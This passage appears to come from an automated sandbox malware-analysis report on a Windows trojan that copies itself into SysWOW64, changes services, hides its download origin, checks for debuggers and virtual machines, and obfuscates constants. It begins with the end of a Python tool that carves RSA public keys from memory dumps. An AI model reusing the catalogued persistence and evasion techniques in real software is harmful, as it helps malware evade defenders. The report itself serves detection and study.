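        pos = buf.find(RSA1_MAGIC, pos + 1)
    return keys


# Constructed 1024-bit demo modulus (top bit forced so bit_length() == 1024);
# not the key carried by this sample.
DEMO_MODULUS = int.from_bytes(
    hashlib.sha512(b"constructed demo, not a real key").digest() * 2, "big"
) | (1 << 1023) | 1
# Constructed "memory dump": padding, the blob, more padding.
DEMO_DUMP = b"\x00" * 37 + build_publickeyblob(DEMO_MODULUS) + b"\xff" * 5


if __name__ == "__main__":
    for offset, key in carve_rsa_public_keys(DEMO_DUMP):
        print(f"offset {offset}: RSA-{key['bits']} e={key['e']} n=0x{key['n']:x}")
```

Run against the `.sdmp` memory dumps this report lists for KBDTUQ.exe, the carver returns candidate offsets plus parsed keys; the sanity checks on bType, aiKeyAlg and bit length are what keep random `RSA1` byte sequences out of the result.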
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | File created: C:\Windows\SysWOW64\fphc\
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | File deleted: C:\Windows\SysWOW64\fphc\KBDTUQ.exe:Zone.Identifier
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_0040D558
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_00420953
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_004109F3
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_00409F47
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02868240
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02867740
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02866530
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02863BA0
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02863F20
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02861C70
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02863D10
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C5ABE
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C92DE
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C380E
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C58AE
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C80CE
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C573E
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C9DDE
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_0040D558
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_00420953
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_004109F3
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_00409F47
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02268240
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02267740
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02266530
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02263BA0
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02263F20
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02261C70
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02263D10
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D5ABE
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D92DE
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D380E
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D58AE
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D80CE
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D573E
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D9DDE
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: String function: 004231CF appears 31 times
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: String function: 0040E598 appears 61 times
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: String function: 0040DA1C appears 138 times
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: String function: 004231CF appears 31 times
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: String function: 0040E598 appears 61 times
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: String function: 0040DA1C appears 138 times
Source: Eacu0dRnuP.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Eacu0dRnuP.exe, 00000000.00000002.229609206.000000000043F000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameRoundWindow.EXEP0 vs Eacu0dRnuP.exe
Source: Eacu0dRnuP.exe, 00000000.00000002.232691117.0000000002DE0000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs Eacu0dRnuP.exe
Source: Eacu0dRnuP.exe, 00000000.00000002.232691117.0000000002DE0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Eacu0dRnuP.exe
Source: Eacu0dRnuP.exe, 00000000.00000002.232124434.0000000002CF0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs Eacu0dRnuP.exe
Source: Eacu0dRnuP.exe | Binary or memory string: OriginalFilenameRoundWindow.EXEP0 vs Eacu0dRnuP.exe
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: classification engine | Classification label: mal88.troj.evad.winEXE@18/8@0/3
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,
Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02264CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_0042309F EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6268:120:WilError_01
Source: Eacu0dRnuP.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Eacu0dRnuP.exe | Virustotal: Detection: 59%
Source: Eacu0dRnuP.exe | Metadefender: Detection: 43%
Source: Eacu0dRnuP.exe | ReversingLabs: Detection: 62%
                Source: unknownProcess created: C:\Users\user\Desktop\Eacu0dRnuP.exe 'C:\Users\user\Desktop\Eacu0dRnuP.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknownProcess created: C:\Windows\SysWOW64\fphc\KBDTUQ.exe C:\Windows\SysWOW64\fphc\KBDTUQ.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknown | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Process created: C:\Windows\SysWOW64\fphc\KBDTUQ.exe C:\Windows\SysWOW64\fphc\KBDTUQ.exe
                Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknown | Process created: C:\Users\user\Desktop\Eacu0dRnuP.exe 'C:\Users\user\Desktop\Eacu0dRnuP.exe'
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknown | Process created: C:\Windows\SysWOW64\fphc\KBDTUQ.exe C:\Windows\SysWOW64\fphc\KBDTUQ.exe
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: Eacu0dRnuP.exe | Static PE information: real checksum: 0x9ad26 should be: 0x97a8c
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_0040E5D3 push ecx; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_0040D670 push eax; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_0040DA1C push eax; ret
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_0040CF44 push eax; iretd
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865EA0 push ecx; mov dword ptr [esp], 0000A3FDh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865EF0 push ecx; mov dword ptr [esp], 0000669Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865E10 push ecx; mov dword ptr [esp], 0000F5B3h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865F20 push ecx; mov dword ptr [esp], 0000E36Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865CD0 push ecx; mov dword ptr [esp], 00001CE1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865D90 push ecx; mov dword ptr [esp], 0000B2E0h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865DC0 push ecx; mov dword ptr [esp], 000089FAh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865DF0 push ecx; mov dword ptr [esp], 0000AAF5h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865D00 push ecx; mov dword ptr [esp], 00001F9Eh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865D20 push ecx; mov dword ptr [esp], 0000C5A1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02865D50 push ecx; mov dword ptr [esp], 00006847h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C7A3E push ecx; mov dword ptr [esp], 0000A3FDh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C7ABE push ecx; mov dword ptr [esp], 0000E36Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C7A8E push ecx; mov dword ptr [esp], 0000669Ch
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C786E push ecx; mov dword ptr [esp], 00001CE1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C78BE push ecx; mov dword ptr [esp], 0000C5A1h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C789E push ecx; mov dword ptr [esp], 00001F9Eh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C78EE push ecx; mov dword ptr [esp], 00006847h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C792E push ecx; mov dword ptr [esp], 0000B2E0h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C795E push ecx; mov dword ptr [esp], 000089FAh
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C79AE push ecx; mov dword ptr [esp], 0000F5B3h
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C798E push ecx; mov dword ptr [esp], 0000AAF5h
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_0040E5D3 push ecx; ret
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_0040D670 push eax; ret
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_0040DA1C push eax; ret

                Persistence and Installation Behavior:

                Drops executables to the windows directory (C:\Windows) and starts them
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Executable created and started: C:\Windows\SysWOW64\fphc\KBDTUQ.exe
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | PE file moved: C:\Windows\SysWOW64\fphc\KBDTUQ.exe

                Hooking and other Techniques for Hiding and Protection:

                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | File opened: C:\Windows\SysWOW64\fphc\KBDTUQ.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_00402FC2 IsIconic,GetWindowPlacement,GetWindowRect,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_00402FC2 IsIconic,GetWindowPlacement,GetWindowRect,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,
                Source: C:\Windows\System32\svchost.exe TID: 1528 | Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_00423C64 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_028638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_00423C64 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_022638F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_0040D473 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,
                Source: svchost.exe, 00000004.00000002.493342251.0000022682029000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW`sF
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: svchost.exe, 00000004.00000002.497522334.0000022687462000.00000004.00000001.sdmp | Binary or memory string: @Hyper-V RAW
                Source: svchost.exe, 00000007.00000002.492738004.000001A534C02000.00000004.00000001.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.497463664.0000022687455000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWH
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 00000007.00000002.492925083.000001A534C28000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.493333947.0000021FB3A29000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: svchost.exe, 00000006.00000002.289462453.0000022CC1140000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.496499985.0000022CEC790000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.307963786.0000018A30340000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_00402270 LoadLibraryA,LoadLibraryA,GetProcAddress,EncryptFileA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02864E20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_02863F20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C5ABE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C69BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_022C0456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_024A1030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02264E20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02263F20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D5ABE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D095E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D69BE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_021D0456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_02211030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_028642F0 GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_00411037 SetUnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exe | Code function: 0_2_0041104B SetUnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_00411037 SetUnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exe | Code function: 3_2_0041104B SetUnhandledExceptionF